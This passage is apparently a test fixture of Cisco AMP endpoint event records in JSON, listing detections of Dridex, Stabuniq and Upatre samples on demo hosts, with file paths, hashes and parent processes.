d8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207844921180000,"timestamp":1610704822,"timestamp_nanoseconds":699000000,"date":"2021-01-15T10:00:22+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207844921180170","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659264906658000,"timestamp":1610704820,"timestamp_nanoseconds":460000000,"date":"2021-01-15T10:00:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659264906657801","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jqs.exe","file_path":"\\\\?\\C:\\Program Files\\7-Zip\\Update\\jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1490719361224000800,"timestamp":1610704819,"timestamp_nanoseconds":224000000,"date":"2021-01-15T10:00:19+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"Win.Trojan.Upatre.tht.VRT","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704819,"start_date":"2021-01-15T10:00:19+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331413502427000,"timestamp":1610704818,"timestamp_nanoseconds":57000000,"date":"2021-01-15T10:00:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331409207459841","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825614973673406000,"timestamp":1610704817,"timestamp_nanoseconds":734000000,"date":"2021-01-15T10:00:17+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":1185,"scanned_processes":22,"scanned_paths":0,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207810561442000,"timestamp":1610704814,"timestamp_nanoseconds":961000000,"date":"2021-01-15T10:00:14+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207810561441801","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207806266474000,"timestamp":1610704813,"timestamp_nanoseconds":963000000,"date":"2021-01-15T10:00:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207806266474504","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207801971507000,"timestamp":1610704812,"timestamp_nanoseconds":902000000,"date":"2021-01-15T10:00:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207801971507206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.cab","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\4543543.cab","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"},"parent":{"process_id":2348,"disposition":"Clean","file_name":"powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7","sha1":"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d","md5":"92f44e405db16ac55d97e3bfe3b132fa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207801971507000,"timestamp":1610704812,"timestamp_nanoseconds":777000000,"date":"2021-01-15T10:00:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207801971507207","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"},"parent":{"process_id":2348,"disposition":"Clean","file_name":"powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7","sha1":"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d","md5":"92f44e405db16ac55d97e3bfe3b132fa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659221956985000,"timestamp":1610704810,"timestamp_nanoseconds":179000000,"date":"2021-01-15T10:00:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659221956984840","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jqs.exe","file_path":"\\\\?\\C:\\Program Files\\7-Zip\\Update\\jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"},"parent":{"process_id":2692,"disposition":"Malicious","file_name":"jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659221956985000,"timestamp":1610704810,"timestamp_nanoseconds":148000000,"date":"2021-01-15T10:00:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659221956984839","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jqs.exe","file_path":"\\\\?\\C:\\Program Files\\7-Zip\\Update\\jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659221956985000,"timestamp":1610704810,"timestamp_nanoseconds":117000000,"date":"2021-01-15T10:00:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659221956984838","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jqs.exe","file_path":"\\\\?\\C:\\Program Files\\7-Zip\\Update\\jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"},"parent":{"process_id":1960,"disposition":"Clean","file_name":"IEXPLORE.EXE","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659221956985000,"timestamp":1610704810,"timestamp_nanoseconds":39000000,"date":"2021-01-15T10:00:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659221956984837","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jqs.exe","file_path":"\\\\?\\C:\\Program Files\\7-Zip\\Update\\jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"},"parent":{"process_id":1960,"disposition":"Clean","file_name":"IEXPLORE.EXE","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659221956985000,"timestamp":1610704810,"timestamp_nanoseconds":7000000,"date":"2021-01-15T10:00:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659217662017540","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"stabuniq.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\stabuniq.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659217662018000,"timestamp":1610704809,"timestamp_nanoseconds":867000000,"date":"2021-01-15T10:00:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659217662017539","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"stabuniq.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\stabuniq.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955899966001000,"timestamp":1610704801,"timestamp_nanoseconds":966000000,"date":"2021-01-15T10:00:01+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.GenericKD:N.18fd.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704801,"start_date":"2021-01-15T10:00:01+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a"},"parent":{"disposition":"Clean","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1439415395844000300,"timestamp":1610704800,"timestamp_nanoseconds":844000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.Variant:Stabuniq.15nx.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704800,"start_date":"2021-01-15T10:00:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb"},"parent":{"disposition":"Clean","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207750431900000,"timestamp":1610704800,"timestamp_nanoseconds":672000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207750431899653","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659179007312000,"timestamp":1610704800,"timestamp_nanoseconds":445000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659179007311874","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"stabuniq.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\stabuniq.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659179007312000,"timestamp":1610704800,"timestamp_nanoseconds":414000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659179007311873","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"stabuniq.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\stabuniq.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"},"parent":{"process_id":3276,"disposition":"Malicious","file_name":"stabuniq.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254540350751000,"timestamp":1610704800,"timestamp_nanoseconds":844000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat 